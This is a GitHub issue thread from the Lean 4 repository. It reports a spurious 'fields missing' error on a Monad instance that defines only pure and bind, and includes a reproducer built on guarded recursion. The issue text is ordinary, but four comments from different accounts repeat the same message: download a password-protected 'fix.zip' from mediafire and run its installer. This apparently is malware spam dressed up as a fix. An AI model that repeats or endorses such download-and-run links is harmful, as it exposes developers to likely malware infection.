### ISSUE TITLE
Missing fields error despite minimal instance implementation for `Monad`

### ISSUE THREAD

**Issue by sgraf812** [leanprover/lean4#5169]
### Prerequisites

Please put an X between the brackets as you perform the following steps:

* [x] Check that your issue is not already filed:
      https://github.com/leanprover/lean4/issues
* [x] Reduce the issue to a minimal, self-contained, reproducible test case.
      Avoid dependencies to Mathlib or Batteries.
* [x] Test your test case against the latest nightly release, for example on
      https://live.lean-lang.org/#project=lean-nightly
      (You can also use the settings there to switch to “Lean nightly”)

### Description

When I implement `pure` and `bind` of `Monad`, I get a missing fields error, prompting me to implement `map`, `mapConst`, `seq`, `seqLeft` as well.
If I extract the code for `bind`, the error goes away.

### Steps to Reproduce

Check this file ([live.lean-lang.org](https://live.lean-lang.org/#project=lean-nightly&code=-------------------------------------------%0D%0A--%20Guarded%20recursion%20and%20the%20Later%20modality%0D%0Auniverse%20u%20v%0D%0A%0D%0Aaxiom%20Later%20%3A%20Sort%20u%20%E2%86%92%20Sort%20u%0D%0Aaxiom%20next%20%7B%CE%B1%20%3A%20Sort%20u%7D%20(a%20%3A%20PUnit%20%E2%86%92%20%CE%B1)%20%3A%20Later%20%CE%B1%0D%0Aaxiom%20ap%20%7B%CE%B1%20%CE%B2%20%3A%20Sort%20u%7D%20(f%20%3A%20Later%20(%CE%B1%20%E2%86%92%20%CE%B2))%20(a%20%3A%20Later%20%CE%B1)%20%3A%20Later%20%CE%B2%0D%0Aaxiom%20gfix%20%7B%CE%B1%20%3A%20Sort%20u%7D%20(f%20%3A%20Later%20%CE%B1%20%E2%86%92%20%CE%B1)%20%3A%20%CE%B1%0D%0A%0D%0Aaxiom%20DLater%20%3A%20Later%20(Sort%20u)%20%E2%86%92%20Sort%20u%0D%0Aaxiom%20DLater.next_eq%20%7B%CE%B1%20%3A%20Sort%20u%7D%20%3A%20Later%20%CE%B1%20%3D%20DLater%20(next%20(fun%20()%20%3D%3E%20%CE%B1))%0D%0A%0D%0A----------------------------------------%0D%0A--%20Repro%0D%0Ainductive%20T.F%20(%CE%B1%20%3A%20Type%20u)%20(%CF%84%20%3A%20Later%20(Type%20u))%20%3A%20Type%20u%20where%0D%0A%20%20%7C%20ret%20%3A%20%CE%B1%20%E2%86%92%20T.F%20%CE%B1%20%CF%84%0D%0A%20%20%7C%20step%20%3A%20DLater%20%CF%84%20%E2%86%92%20T.F%20%CE%B1%20%CF%84%0D%0Adef%20T%20%CE%B1%20%3A%3D%20gfix%20(T.F%20%CE%B1)%0D%0Atheorem%20T.unfold%20%3A%20T%20%CE%B1%20%3D%20T.F%20%CE%B1%20(next%20(fun%20()%20%3D%3E%20T%20%CE%B1))%20%3A%3D%20sorry%20%0D%0Adef%20T.ret%20(x%20%3A%20%CE%B1)%20%3A%20T%20%CE%B1%20%3A%3D%20sorry%0D%0Adef%20T.step%20(tl%20%3A%20Later%20(T%20%CE%B1))%20%3A%20T%20%CE%B1%20%3A%3D%20sorry%0D%0A%0D%0Ainstance%20%3A%20Monad%20T%20where%0D%0A%20%20pure%20%3A%3D%20T.ret%0D%0A%20%20bind%20%7B%CE%B1%20%CE%B2%7D%20t%20k%20%3A%3D%0D%0A%20%20%20%20let%20loop%20loop'%20t%20%3A%20T%20%CE%B2%20%3A%3D%20match%20cast%20T.unfold%20t%20with%0D%0A%20%20%20%20%20%20%7C%20.ret%20a%20%20%20%3D%3E%20k%20a%0D%0A%20%20%20%20%20%20%7C%20.step%20tl%20%3D%3E%20T.step%20(ap%20loop'%20(cast%20DLater.next_eq.symm%20tl))%0D%0A%20%20%20%20gfix%20loop%20t%0D%0A)):

```
-------------------------------------------
-- Guarded recursion and the Later modality
universe u v

axiom Later : Sort u → Sort u
axiom next {α : Sort u} (a : PUnit → α) : Later α
axiom ap {α β : Sort u} (f : Later (α → β)) (a : Later α) : Later β
axiom gfix {α : Sort u} (f : Later α → α) : α

axiom DLater : Later (Sort u) → Sort u
axiom DLater.next_eq {α : Sort u} : Later α = DLater (next (fun () => α))

----------------------------------------
-- Repro
inductive T.F (α : Type u) (τ : Later (Type u)) : Type u where
  | ret : α → T.F α τ
  | step : DLater τ → T.F α τ
def T α := gfix (T.F α)
theorem T.unfold : T α = T.F α (next (fun () => T α)) := sorry
def T.ret (x : α) : T α := sorry
def T.step (tl : Later (T α)) : T α := sorry

instance : Monad T where
  pure := T.ret
  bind {α β} t k :=
    let loop loop' t : T β := match cast T.unfold t with
      | .ret a   => k a
      | .step tl => T.step (ap loop' (cast DLater.next_eq.symm tl))
    gfix loop t
```

**Expected behavior:** No error.

**Actual behavior:** An error in the `instance : Monad T where` line:

```
fields missing: 'map', 'mapConst', 'seq', 'seqLeft'
```

Now extract the RHS of `bind` into a separate definition:

```
noncomputable def T.bind {α β} (t : T α) (k : α → T β) : T β := 
  let loop loop' t : T β := match cast T.unfold t with
    | .ret a   => k a
    | .step tl => T.step (ap loop' (cast DLater.next_eq.symm tl))
  gfix loop t
noncomputable instance : Monad T where
  pure := T.ret
  bind := T.bind
```

No error, as expected. (`noncomputable` is needed because I omitted several definitions in the reproducer.)

### Versions

4.10.0-rc2
Windows + live.lean-lang.org

### Impact

Add :+1: to [issues you consider important](https://github.com/leanprover/lean4/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc). If others are impacted by this issue, please ask them to add :+1: to it.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
